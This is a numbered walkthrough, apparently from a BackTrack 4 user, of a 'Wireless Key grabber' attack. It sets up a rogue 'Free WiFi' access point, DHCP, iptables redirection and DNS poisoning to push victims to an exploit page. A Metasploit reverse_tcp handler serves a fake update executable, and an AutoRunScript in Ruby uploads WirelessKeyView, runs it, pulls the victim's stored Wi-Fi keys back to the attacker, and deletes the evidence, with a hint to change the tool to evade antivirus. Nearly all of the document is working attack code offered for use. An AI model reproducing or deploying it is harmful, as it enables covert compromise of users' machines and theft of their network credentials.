hm2075

1. Wireless Key grabber -- how the script works
2. hm2075@hotmail.com
3. for bt4 pre final
4.  
5. # Copying dhcpd.conf
6. The first stage is copying the dhcpd.conf to its correct location
7. Here is a peek at the dhcpd.conf
8. ddns-update-style ad-hoc;
9. default-lease-time 600;
10. max-lease-time 7200;
11. subnet 10.0.0.0 netmask 255.255.255.0 {
12. option routers 10.0.0.1;
13. option subnet-mask 255.255.255.0;
14. option broadcast-address 10.0.0.0;
15. option domain-name "example.com";
16. option domain-name-servers 10.0.0.1;
17. range dynamic-bootp 10.0.0.16 10.0.0.55;
18. #range 10.0.0.20 10.0.0.50;
19.  
20. }
21.  
22. # FakeAP
23. modprobe tun is required
24. airmon-ng start interface   --- this sets your interface into monitor mode
25. airbase-ng -e "Free WiFi" mon0 -v   ------ this starts a standard AP on mon0
26.  
27.  
28.  
29. # Getting metasploit ready
30. "Loading Metasploit with hb.rc"
31. ./msfconsole -r /root/WK/hb.rc &
32.  
33. lets have a look at hb.rc
34. use exploit/multi/handler
35. set PAYLOAD windows/meterpreter/reverse_tcp      --- I created the meterpreter.exe earlier on port 28 i.e our fake update exe
36. set LHOST 10.0.0.1
37. set LPORT 28
38. set AutoRunScript /root/WK/hb.rb           ----- this is the script we want to run once the meterpreter.exe is loaded by the victim
39. set ExitOnSession false     ----- we dont want to exit
40. show options
41. exploit -j      
42.  
43.  
44. We shall have a quick look at hb.rb
45.  
46. # Wireless key harvester using wireless key viewer"
47. require 'rex'
48. # Extract the host and port
49. host,port = session.tunnel_peer.split(':')
50. print_status("New session found on #{host}:#{port}...")
51.  
52. # bin -- the name of our exe
53. bin = "wkv.exe"
54.  
55. # output of wireless key viewer -------- we want our txt file name to be random otherwise it will get overwritten
56. out  = Rex::Text.rand_text_alpha_upper(5) + ".txt"
57.  
58. #destination for the keys in txt format
59. dest = "/root/WK/keys/"
60. #
61.  
62. #
63. #upload wireless key viewer --- modify it to bypass av's
64. #
65.  
66. #
67. print_status("Uploading Wireless Key Viewer")
68. #
69. sleep(1)
70. # We upload our file to go into system drive not c: because some can be D: etc etc
71. client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/root/WK/wkv.exe")
72. #
73. sleep(1)
74. #
75. print_status("Uploaded Wireless Key Viewer")
76. #
77. sleep(1)
78. #
79. #execute via cmd, output will be random name,
80. #
81. print_status("Executing wireless key viewer ")
82. # We execute here
83. client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stext /#{out}", nil, {'Hidden' => 'false'})
84. #
85. print_status("wkv file executed")
86. #
87. sleep(1)
88. #
89.  
90. #
91. #download keys to our keys folder
92. # and we download keys here
93. print_status("Downloading keys to keys folder ")
94. #
95. client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
96. #
97. print_status("Downloaded keys to keys folder ")
98. #
99.  
100. #
101.  
102. #
103. #delete uploaded files -- we can also clear logs here if we want to
104. # and then we delete what we have done i.e delete wkv.exe and the txt file
105. sleep(1)
106. #
107. print_status("Deleting uploaded files ")
108. #
109. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
110. #
111. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
112. #
113. print_status("Have a nice day!!!!!! ")
114.  
115.  
116.  
117.  
118. # Setting up IP tables and dhcp server
119. echo "Setting up IPTABLES"
120. ifconfig at0 up
121. ifconfig lo up
122. ifconfig at0 10.0.0.1 netmask 255.255.255.0
123. ifconfig at0 mtu 1400
124. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
125. iptables --flush
126. iptables --table nat --flush
127. iptables --delete-chain
128. iptables --table nat --delete-chain
129. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
130. iptables -P FORWARD ACCEPT
131. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
132. sleep 2
133. /etc/init.d/dhcp3-server restart
134. echo "IPTABLES updated and dhcp server started"
135. sleep 2
136.  
137. #start webserver  --- I prefer lighttpd because I can use a custom conf file to change location of the index.html
138. echo "starting webserver"
139. /etc/init.d/lighttpd stop
140. sleep 2
141. lighttpd -f '/root/WK/lighttpd.conf'
142. sleep 2
143. echo "Web server started"
144. sleep 2
145.  
146. #start dns poison   ---- this is straight forward, we just redirect our victims to our exploit page
147. echo "Starting dns redirector"
148. sleep 2
149. cd /
150. cd root/WK
151. xterm -geometry 75x15+500+0 -T DNSPoison -e java ServerKernelMain 10.0.0.1 10.0.0.1&
152. echo "DNS poison started, check DNS poison if victims are being redirected to our webserver"
153.  
154. sleep 2
155.  
156. echo "Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited"
157.  
158. sleep 2
159.  
160. echo "Opening WKV folder, keys will be uploaded in here"
161. sleep 2
162. konqueror --geometry 605x305+500+500 --select /root/WK/keys/
163.  
164.  
165.  
166.  
167.